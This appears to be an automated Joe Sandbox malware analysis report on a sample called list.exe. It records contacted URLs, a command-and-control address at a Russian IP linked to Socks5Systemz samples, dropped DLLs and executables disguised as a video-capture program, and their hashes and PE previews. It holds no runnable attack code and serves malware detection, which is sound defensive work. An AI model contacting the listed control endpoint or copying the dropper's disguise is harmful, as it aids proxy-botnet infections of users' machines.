https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325 | bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003351000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: malware | unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | false | | high
https://www.easycutstudio.com/support.html | list.exe, 00000000.00000002.2501420585.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252011519.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252079119.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254668449.0000000003230000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502938488.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254793591.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502072974.0000000000786000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.119.66.185 | unknown | Russian Federation | | 209499 | FLYNETRU | false
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1577465
                                                                                              Start date and time:2024-12-18 13:58:09 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 39s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:15
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:list.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winEXE@14/31@1/1
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 91%
                                                                                              • Number of executed functions: 172
                                                                                              • Number of non-executed functions: 322
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 20.12.23.50
                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • VT rate limit hit for: list.exe
Time | Type | Description
09:47:31 | API Interceptor | 427281x Sleep call for process: bsoftvideocapture33.exe modified
09:47:57 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.119.66.185 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse |
 | stail.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse |
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | Oz2UhFBTHy.exe | Get hash | malicious | Socks5Systemz | Browse |
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse |
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse |
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse |
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse |
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FLYNETRU | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | stail.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | Oz2UhFBTHy.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
51c64c77e60f3980eea90869b68c58a8 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | stail.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | cd#U9988.exe | Get hash | malicious | Unknown | Browse | • 188.119.66.185
 | Oz2UhFBTHy.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse | • 188.119.66.185
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse |
 | stail.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | newwork.exe.1.exe | Get hash | malicious | Socks5Systemz | Browse |
 | steel.exe.3.exe | Get hash | malicious | Socks5Systemz | Browse |
 | AbC0LBkVhr.exe | Get hash | malicious | Socks5Systemz | Browse |
 | Oz2UhFBTHy.exe | Get hash | malicious | Socks5Systemz | Browse |
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse |
 | GEm3o8pION.exe | Get hash | malicious | Socks5Systemz | Browse |
 | bzX2pV3Ybw.exe | Get hash | malicious | Socks5Systemz | Browse |
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363850056196269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:vyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:vj0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      SHA1:7A08B8C0D7C8223F79DFFA1EA3C7415EC298DB27
                                                                                                                                      SHA-256:736FBECCE9DB80A4E4D376AFBB653CB4356912E75D6B805303D09E8129F07C83
                                                                                                                                      SHA-512:AE55F4FC99A54D40C4912F562805B644BC05F40D9A9673D943F52A59DC3D049387DA796E96C984AA3C70CC41B5F2E1196FADC4D55EE6AE5241B4F5A869918E13
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Reputation:low
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: newwork.exe.1.exe, Detection: malicious
• Filename: stail.exe.3.exe, Detection: malicious
• Filename: steel.exe.3.exe, Detection: malicious
• Filename: newwork.exe.1.exe, Detection: malicious
• Filename: steel.exe.3.exe, Detection: malicious
• Filename: AbC0LBkVhr.exe, Detection: malicious
• Filename: Oz2UhFBTHy.exe, Detection: malicious
• Filename: GEm3o8pION.exe, Detection: malicious
• Filename: GEm3o8pION.exe, Detection: malicious
• Filename: bzX2pV3Ybw.exe, Detection: malicious
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8
                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oi:oi
                                                                                                                                      MD5:E195F84642A0937D5A9ACA8D8BD2E365
                                                                                                                                      SHA1:34734EB8662139D044B17BD2D32E5B12FEBE2695
                                                                                                                                      SHA-256:6AB49F960467128016D8A129BFC4955B332A27B6416A5C833F31B54A23071E01
                                                                                                                                      SHA-512:54FFCB519385AF9BFEE0ADA78E4C822724872E2AE900AEC91035CD911095B4F3AB549AA6A28959DFDF02022165DA13487F5C7B2FD6F26D24C577AB4B127DE6AC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4
                                                                                                                                      Entropy (8bit):0.8112781244591328
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:2B197A84C60EC779B10736BB6475B5E9
                                                                                                                                      SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
                                                                                                                                      SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
                                                                                                                                      SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):128
                                                                                                                                      Entropy (8bit):2.9012093522336393
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                                                                      MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                                                                      SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                                                                      SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                                                                      SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):265728
                                                                                                                                      Entropy (8bit):6.4472652154517345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                                                      MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                                                      SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                                                      SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                                                      SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):78183
                                                                                                                                      Entropy (8bit):7.692742945771669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):176128
                                                                                                                                      Entropy (8bit):6.204917493416147
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363850056196269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:vyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:vj0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      SHA1:7A08B8C0D7C8223F79DFFA1EA3C7415EC298DB27
                                                                                                                                      SHA-256:736FBECCE9DB80A4E4D376AFBB653CB4356912E75D6B805303D09E8129F07C83
                                                                                                                                      SHA-512:AE55F4FC99A54D40C4912F562805B644BC05F40D9A9673D943F52A59DC3D049387DA796E96C984AA3C70CC41B5F2E1196FADC4D55EE6AE5241B4F5A869918E13
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1645320
                                                                                                                                      Entropy (8bit):6.787752063353702
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):499712
                                                                                                                                      Entropy (8bit):6.414789978441117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348160
                                                                                                                                      Entropy (8bit):6.542655141037356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363849659253791
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:iyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:ij0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:E68B0C2B1D44B26ED7983319E7A9ECAC
                                                                                                                                      SHA1:0338F9C6D61156238A2266B55D107027C4C7BCD9
                                                                                                                                      SHA-256:2DEADE9C6A9B89572C2A106321041E73DA1028923788E4FDE086B79BA01E5A25
                                                                                                                                      SHA-512:02C823A86CBA517901822F995ECC6E290233621796088A37FCE7CD64EE97062CC3D55DF12B87D9D1076BA985040C386F5EB31847B08742E05927AF43CD202006
                                                                                                                                      Malicious:false
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmp, Author: Joe Security
                                                                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...0vag.....................l......4D............@..........................`4.......4.....................................,........@..................................................................................T..........................._aett_1............................ ..`_aftt_1..-..........................@..@_agtt_1..d.......2..................@....rsrc........@......................@..@_ahtt_1..@... ...?..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):176128
                                                                                                                                      Entropy (8bit):6.204917493416147
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1645320
                                                                                                                                      Entropy (8bit):6.787752063353702
                                                                                                                                      Encrypted:false
